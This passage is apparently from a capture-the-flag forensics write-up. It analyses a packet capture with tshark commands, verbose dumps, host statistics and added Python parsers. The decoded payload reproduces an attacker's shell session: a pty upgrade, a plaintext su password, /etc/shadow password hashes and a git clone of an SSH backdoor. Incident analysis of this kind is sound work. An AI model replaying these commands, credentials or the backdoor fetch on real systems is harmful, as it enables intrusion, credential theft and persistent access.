205 131.924810547 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=22561 Win=63184 Len=0
206 131.925254738 140.82.118.4 → 192.168.170.159 TLSv1.2 2210 Application Data, Application Data
207 131.925324681 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=24717 Win=63184 Len=0
208 132.044977929 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
209 132.045027690 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=26116 Win=63184 Len=0
210 132.045108132 140.82.118.4 → 192.168.170.159 TLSv1.2 2889 Application Data, Application Data
211 132.045156342 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=28951 Win=63184 Len=0
212 132.045575673 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
213 132.045640405 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=30313 Win=63184 Len=0
214 132.046020945 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
215 132.046175449 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=31749 Win=63184 Len=0
216 132.046181229 140.82.118.4 → 192.168.170.159 TLSv1.2 2815 Application Data, Application Data
217 132.046269741 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=34510 Win=63184 Len=0
218 132.046508518 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=37382 Win=63184 Len=0
219 132.046515448 140.82.118.4 → 192.168.170.159 TCP 2926 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=34510 Ack=1027 Win=64240 Len=2872
220 132.046943999 140.82.118.4 → 192.168.170.159 TLSv1.2 2778 Ignored Unknown Record
221 132.046995951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=40106 Win=63184 Len=0
222 132.047117094 140.82.118.4 → 192.168.170.159 TLSv1.2 1321 Application Data
223 132.047219827 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=41373 Win=63184 Len=0
224 132.094178628 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
225 132.094319951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=42772 Win=63184 Len=0
226 132.094446085 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
227 132.129676781 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
228 132.129759233 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=45570 Win=63184 Len=0
229 132.129963958 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
230 132.130342869 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
231 132.130344819 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=48368 Win=63184 Len=0
232 132.171939650 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
233 132.172162936 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
234 132.172169976 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=51166 Win=63184 Len=0
235 132.178881331 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
236 132.179088046 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
237 132.179151938 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=53964 Win=63184 Len=0
238 132.213735698 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
239 132.214095967 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
240 132.214176359 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=56762 Win=63184 Len=0
Rest of the output omitted.
We look at part of the capture in verbose mode (tshark -V), which prints every dissected field of each frame:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -V
Running as user "root" and group "root". This could be dangerous.
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162229164 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162229164 seconds
[Time delta from previous captured frame: 0.000000000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Frame Length: 74 bytes (592 bits)
Capture Length: 74 bytes (592 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 60
Identification: 0xd0e5 (53477)
010. .... = Flags: 0x2, Don't fragment
0... .... = Reserved bit: Not set
.1.. .... = Don't fragment: Set
..0. .... = More fragments: Not set
...0 0000 0000 0000 = Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x9354 [validation disabled]
[Header checksum status: Unverified]
Source Address: 192.168.170.145
Destination Address: 192.168.170.159
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 0, Len: 0
Source Port: 47732
Destination Port: 80
[Stream index: 0]
[Conversation completeness: Incomplete (0)]
[TCP Segment Len: 0]
Sequence Number: 0 (relative sequence number)
Sequence Number (raw): 2491250218
[Next Sequence Number: 1 (relative sequence number)]
Acknowledgment Number: 0
Acknowledgment number (raw): 0
1010 .... = Header Length: 40 bytes (10)
Flags: 0x002 (SYN)
000. .... .... = Reserved: Not set
...0 .... .... = Accurate ECN: Not set
.... 0... .... = Congestion Window Reduced: Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...0 .... = Acknowledgment: Not set
.... .... 0... = Push: Not set
.... .... .0.. = Reset: Not set
.... .... ..1. = Syn: Set
[Expert Info (Chat/Sequence): Connection establish request (SYN): server port 80]
[Connection establish request (SYN): server port 80]
[Severity level: Chat]
[Group: Sequence]
.... .... ...0 = Fin: Not set
[TCP Flags: ··········S·]
Window: 64240
[Calculated window size: 64240]
Checksum: 0x67cd [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
TCP Option - Maximum segment size: 1460 bytes
Kind: Maximum Segment Size (2)
Length: 4
MSS Value: 1460
TCP Option - SACK permitted
Kind: SACK Permitted (4)
Length: 2
TCP Option - Timestamps
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 3256059711: TSval 3256059711, TSecr 0
Timestamp echo reply: 0
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
Length: 3
Shift count: 7
[Multiplier: 128]
[Timestamps]
[Time since first frame in this TCP stream: 0.000000000 seconds]
[Time since previous frame in this TCP stream: 0.000000000 seconds]
Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162351706 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162351706 seconds
[Time delta from previous captured frame: 0.000122542 seconds]
[Time delta from previous displayed frame: 0.000122542 seconds]
[Time since reference or first frame: 0.000122542 seconds]
Frame Number: 2
Frame Length: 74 bytes (592 bits)
Capture Length: 74 bytes (592 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_6e:18:17 (00:0c:29:6e:18:17), Dst: VMware_17:ba:48 (00:0c:29:17:ba:48)
Destination: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 60
Identification: 0x0000 (0)
010. .... = Flags: 0x2, Don't fragment
0... .... = Reserved bit: Not set
.1.. .... = Don't fragment: Set
..0. .... = More fragments: Not set
...0 0000 0000 0000 = Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x643a [validation disabled]
[Header checksum status: Unverified]
Source Address: 192.168.170.159
Destination Address: 192.168.170.145
Transmission Control Protocol, Src Port: 80, Dst Port: 47732, Seq: 0, Ack: 1, Len: 0
Source Port: 80
Destination Port: 47732
[Stream index: 0]
[Conversation completeness: Incomplete, SYN_SENT (1)]
[TCP Segment Len: 0]
Sequence Number: 0 (relative sequence number)
Sequence Number (raw): 3813293411
[Next Sequence Number: 1 (relative sequence number)]
Acknowledgment Number: 1 (relative ack number)
Acknowledgment number (raw): 2491250219
1010 .... = Header Length: 40 bytes (10)
Flags: 0x012 (SYN, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Accurate ECN: Not set
.... 0... .... = Congestion Window Reduced: Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 0... = Push: Not set
.... .... .0.. = Reset: Not set
.... .... ..1. = Syn: Set
[Expert Info (Chat/Sequence): Connection establish acknowledge (SYN+ACK): server port 80]
[Connection establish acknowledge (SYN+ACK): server port 80]
[Severity level: Chat]
[Group: Sequence]
.... .... ...0 = Fin: Not set
[TCP Flags: ·······A··S·]
Window: 65160
[Calculated window size: 65160]
Checksum: 0x004c [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
TCP Option - Maximum segment size: 1460 bytes
Kind: Maximum Segment Size (2)
Length: 4
MSS Value: 1460
TCP Option - SACK permitted
Kind: SACK Permitted (4)
Length: 2
TCP Option - Timestamps
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 894438874: TSval 894438874, TSecr 3256059711
Timestamp echo reply: 3256059711
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
Length: 3
Shift count: 7
[Multiplier: 128]
[Timestamps]
[Time since first frame in this TCP stream: 0.000122542 seconds]
[Time since previous frame in this TCP stream: 0.000122542 seconds]
[SEQ/ACK analysis]
[This is an ACK to the segment in frame: 1]
[The RTT to ACK the segment was: 0.000122542 seconds]
Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162441018 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162441018 seconds
[Time delta from previous captured frame: 0.000089312 seconds]
[Time delta from previous displayed frame: 0.000089312 seconds]
[Time since reference or first frame: 0.000211854 seconds]
Frame Number: 3
Frame Length: 66 bytes (528 bits)
Capture Length: 66 bytes (528 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Output continues.
We look at the connection statistics for our host IP. Besides the connections from the attacker's IP, there is another suspicious address, 140.82.118.4:
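The verbose dump above is exhaustive but hard to reason about by eye. As an added example (not part of the original writeup), the following Python condenses `tshark -V` output into one record per frame and then checks that the first three frames form a consistent TCP three-way handshake using the raw sequence numbers: the SYN+ACK must acknowledge the client's ISN + 1, the final ACK must carry ISN + 1 and acknowledge the server's ISN + 1, and the ports must be mirrored. The sample text is a constructed excerpt in the `-V` layout; frames 1 and 2 use the values shown above, frame 3 is made up to complete the handshake.

```python
import re

# Constructed excerpt in the `tshark -V` layout (frames 1 and 2 carry the values
# shown in the writeup; frame 3 is made up to complete the handshake).
SAMPLE_VERBOSE = """\
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Arrival Time: Jul 21, 2020 17:33:53.162229164 -03
    [Protocols in frame: eth:ethertype:ip:tcp]
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
    010. .... = Flags: 0x2, Don't fragment
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 0, Len: 0
    Sequence Number (raw): 2491250218
    Acknowledgment number (raw): 0
    Flags: 0x002 (SYN)
Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Arrival Time: Jul 21, 2020 17:33:53.162351706 -03
    [Protocols in frame: eth:ethertype:ip:tcp]
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
Transmission Control Protocol, Src Port: 80, Dst Port: 47732, Seq: 0, Ack: 1, Len: 0
    Sequence Number (raw): 3813293411
    Acknowledgment number (raw): 2491250219
    Flags: 0x012 (SYN, ACK)
Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface ens33, id 0
    Arrival Time: Jul 21, 2020 17:33:53.162441018 -03
    [Protocols in frame: eth:ethertype:ip:tcp]
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 1, Ack: 1, Len: 0
    Sequence Number (raw): 2491250219
    Acknowledgment number (raw): 3813293412
    Flags: 0x010 (ACK)
"""

FRAME_RE = re.compile(r"^Frame (\d+): (\d+) bytes on wire")
ARRIVAL_RE = re.compile(r"^\s*Arrival Time: (.+)$")
PROTOCOLS_RE = re.compile(r"^\s*\[Protocols in frame: ([^\]]+)\]")
IP_RE = re.compile(r"^Internet Protocol Version 4, Src: (\S+), Dst: (\S+)")
TCP_RE = re.compile(r"^Transmission Control Protocol, Src Port: (\d+), Dst Port: (\d+)")
SEQ_RAW_RE = re.compile(r"^\s*Sequence Number \(raw\): (\d+)")
ACK_RAW_RE = re.compile(r"^\s*Acknowledgment number \(raw\): (\d+)")
# TCP flags look like "Flags: 0x012 (SYN, ACK)"; the IPv4 flags line
# ("010. .... = Flags: 0x2, Don't fragment") deliberately does not match.
TCP_FLAGS_RE = re.compile(r"^\s*Flags: 0x([0-9a-f]{3}) \(([^)]*)\)")


def parse_verbose(text):
    """One dict per frame holding the fields needed for stream analysis."""
    frames, cur = [], None
    for line in text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            cur = {"no": int(m.group(1)), "wire_len": int(m.group(2))}
            frames.append(cur)
            continue
        if cur is None:
            continue  # banner lines before the first frame
        if (m := ARRIVAL_RE.match(line)):
            cur["arrival"] = m.group(1)
        elif (m := PROTOCOLS_RE.match(line)):
            cur["protocols"] = m.group(1).split(":")
        elif (m := IP_RE.match(line)):
            cur["src"], cur["dst"] = m.group(1), m.group(2)
        elif (m := TCP_RE.match(line)):
            cur["sport"], cur["dport"] = int(m.group(1)), int(m.group(2))
        elif (m := SEQ_RAW_RE.match(line)):
            cur["seq_raw"] = int(m.group(1))
        elif (m := ACK_RAW_RE.match(line)):
            cur["ack_raw"] = int(m.group(1))
        elif (m := TCP_FLAGS_RE.match(line)):
            cur["flags"] = frozenset(f.strip() for f in m.group(2).split(","))
    return frames


def check_handshake(frames):
    """Validate SYN / SYN+ACK / ACK across the first three frames of a stream."""
    if len(frames) < 3:
        return False, ["fewer than three frames"]
    syn, synack, ack = frames[:3]
    problems = []
    if syn.get("flags") != {"SYN"}:
        problems.append("frame 1 is not a bare SYN")
    if synack.get("flags") != {"SYN", "ACK"}:
        problems.append("frame 2 is not SYN+ACK")
    if ack.get("flags") != {"ACK"}:
        problems.append("frame 3 is not a bare ACK")
    if (synack.get("sport"), synack.get("dport")) != (syn.get("dport"), syn.get("sport")):
        problems.append("SYN+ACK does not mirror the SYN's ports")
    if synack.get("ack_raw") != syn.get("seq_raw", -2) + 1:
        problems.append("SYN+ACK does not acknowledge the client ISN + 1")
    if (ack.get("seq_raw") != syn.get("seq_raw", -2) + 1
            or ack.get("ack_raw") != synack.get("seq_raw", -2) + 1):
        problems.append("final ACK sequence/ack numbers do not match the ISNs")
    return not problems, problems


if __name__ == "__main__":
    fr = parse_verbose(SAMPLE_VERBOSE)
    for f in fr:
        print(f["no"], f["src"], f["sport"], "->", f["dst"], f["dport"], sorted(f["flags"]))
    print(check_handshake(fr))
```

The same regexes work on the unindented form of the dump shown above, because each pattern tolerates leading whitespace. In practice the structured fields are easier to get with `tshark -T fields -e tcp.seq_raw -e tcp.ack_raw -e tcp.flags`, but the parser is a useful fallback when only a saved text dump of the verbose output is available.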
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z ip_hosts,tree
=================================================================================================================================
IPv4 Statistics/All Addresses:
Topic / Item Count Average Min Val Max Val Rate (ms) Percent Burst Rate Burst Start
---------------------------------------------------------------------------------------------------------------------------------
All Addresses 3865 0,0134 100% 0,9300 139,353
192.168.170.159 3840 0,0133 99,35% 0,9300 139,353
140.82.118.4 3228 0,0112 83,52% 0,9300 139,353
192.168.170.145 608 0,0021 15,73% 0,4600 229,070
192.168.170.1 21 0,0001 0,54% 0,0600 173,637
239.255.255.250 14 0,0000 0,36% 0,0100 137,256
224.0.0.251 4 0,0000 0,10% 0,0400 173,649
192.168.170.2 4 0,0000 0,10% 0,0400 130,813
192.168.170.138 4 0,0000 0,10% 0,0200 40,711
224.0.0.22 3 0,0000 0,08% 0,0200 173,637
91.189.91.157 2 0,0000 0,05% 0,0200 92,969
192.168.170.254 2 0,0000 0,05% 0,0200 40,711
--------------------------------------------------------------------------------------------------------------------------------
We view only the head of the endpoints table this way, with -q and piping through head:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z endpoints,eth0 -q | head
Running as user "root" and group "root". This could be dangerous.
================================================================================
Ethernet Endpoints
Filter:<No Filter>
| Packets | | Bytes | | Tx Packets | | Tx Bytes | | Rx Packets | | Rx Bytes |
VMware_6e:18:17 3843 3753721 1729 185301 2114 3568420
VMware_f9:85:10 3240 3564469 1771 3475258 1469 89211
VMware_17:ba:48 610 189696 347 93432 263 96264
VMware_c0:00:08 42 21154 42 21154 0 0
IPv6mcast_0c 14 10052 0 0 14 10052
IPv4mcast_7f:ff:fa 14 9772 0 0 14 9772
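The two tshark statistics above (ip_hosts and endpoints) can be rebuilt from the one-line packet summaries at the top of this section, which is handy when only the text listing of a capture survives. As an added example (not from the original writeup), the following Python parses constructed lines in that summary format, computes the per-address packet count and share (as `-z ip_hosts,tree` does), the per-address Tx/Rx packets and bytes (as `-z endpoints` does), and then flags TCP conversations in which neither side uses a well-known service port, which is exactly how the 4242 listener stands out next to the legitimate 443 traffic to 140.82.118.4. The sample lines and the WELL_KNOWN_PORTS set are my assumptions, not part of the capture.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in the `tshark -r capture.pcapng` summary format
# (a handful of lines shaped like the listing above, not the real capture).
SAMPLE_SUMMARY = """\
111 95.931106336 192.168.170.145 → 192.168.170.159 TCP 87 4242 → 57680 [PSH, ACK] Seq=150 Ack=1521 Win=64384 Len=21
112 95.931488256 192.168.170.159 → 192.168.170.145 TCP 88 57680 → 4242 [PSH, ACK] Seq=1521 Ack=171 Win=64256 Len=22
118 98.107828955 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 Who has 192.168.170.2? Tell 192.168.170.138
125 130.812969381 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xea9e A github.com OPT
130 130.834210483 192.168.170.2 → 192.168.170.159 DNS 97 Standard query response 0xea9e A github.com A 140.82.118.4 OPT
131 130.840570509 192.168.170.159 → 140.82.118.4 TCP 74 42174 → 443 [SYN] Seq=0 Win=64240 Len=0
132 130.868572111 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0
134 130.894779433 192.168.170.159 → 140.82.118.4 TLSv1 290 Client Hello
164 131.763155262 192.168.170.159 → 192.168.170.145 TCP 160 57680 → 4242 [PSH, ACK] Seq=3121 Ack=223 Win=64256 Len=94
"""

# no, time, src, dst, protocol, frame length, remaining info column
LINE_RE = re.compile(r"^(\d+)\s+([\d.]+)\s+(\S+)\s+→\s+(\S+)\s+(\S+)\s+(\d+)\s*(.*)$")
PORTS_RE = re.compile(r"^(\d+)\s+→\s+(\d+)\s+\[([^\]]*)\]")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
WELL_KNOWN_PORTS = {22, 53, 80, 443}  # assumption: what counts as "expected" here


def parse_summary(text):
    """Parse tshark one-line summaries; non-matching lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        no, ts, src, dst, proto, length, info = m.groups()
        pkt = {"no": int(no), "time": float(ts), "src": src, "dst": dst,
               "proto": proto, "len": int(length), "info": info,
               "sport": None, "dport": None, "flags": ()}
        pm = PORTS_RE.match(info)  # only TCP/UDP summaries carry "sport → dport [flags]"
        if pm:
            pkt["sport"], pkt["dport"] = int(pm.group(1)), int(pm.group(2))
            pkt["flags"] = tuple(f.strip() for f in pm.group(3).split(","))
        packets.append(pkt)
    return packets


def ip_host_stats(packets):
    """Per-address packet count and share of all IPv4 packets (like -z ip_hosts,tree)."""
    ip_pkts = [p for p in packets if IPV4_RE.match(p["src"]) and IPV4_RE.match(p["dst"])]
    counts = Counter()
    for p in ip_pkts:
        counts[p["src"]] += 1
        if p["dst"] != p["src"]:
            counts[p["dst"]] += 1
    total = len(ip_pkts)
    return {addr: (n, round(100.0 * n / total, 2)) for addr, n in counts.items()}


def endpoint_stats(packets):
    """Tx/Rx packets and bytes per address, including link-layer names (like -z endpoints)."""
    ep = defaultdict(lambda: {"tx_packets": 0, "tx_bytes": 0, "rx_packets": 0, "rx_bytes": 0})
    for p in packets:
        ep[p["src"]]["tx_packets"] += 1
        ep[p["src"]]["tx_bytes"] += p["len"]
        ep[p["dst"]]["rx_packets"] += 1
        ep[p["dst"]]["rx_bytes"] += p["len"]
    return dict(ep)


def suspicious_conversations(packets, known_ports=WELL_KNOWN_PORTS):
    """TCP conversations where neither endpoint uses a well-known service port."""
    convs = Counter()
    for p in packets:
        if p["sport"] is None:
            continue
        key = tuple(sorted([(p["src"], p["sport"]), (p["dst"], p["dport"])]))
        convs[key] += 1
    return [(key, n) for key, n in convs.items()
            if not any(port in known_ports for _, port in key)]


if __name__ == "__main__":
    pk = parse_summary(SAMPLE_SUMMARY)
    for addr, (n, pct) in sorted(ip_host_stats(pk).items(), key=lambda kv: -kv[1][0]):
        print(f"{addr:<18} {n:>5} {pct:>7.2f}%")
    print(endpoint_stats(pk)["192.168.170.159"])
    print(suspicious_conversations(pk))
```

The percentage is computed the way tshark does it, as a share of all IPv4 packets, which is why a host that appears in every packet (192.168.170.159 here) reports 100% and the column does not sum to 100. TLS summaries such as "Client Hello" carry no port pair in the info column, so they are counted in the host and endpoint statistics but not in the conversation table; for a full conversation view use `-z conv,tcp` directly on the capture.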
We filter to get more specific information from the ASCII payload of each packet. We see the /etc/shadow entry for james, many commands in the clear, and the plaintext password used for su james (Password: whenevernoteartinstant), among much more:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
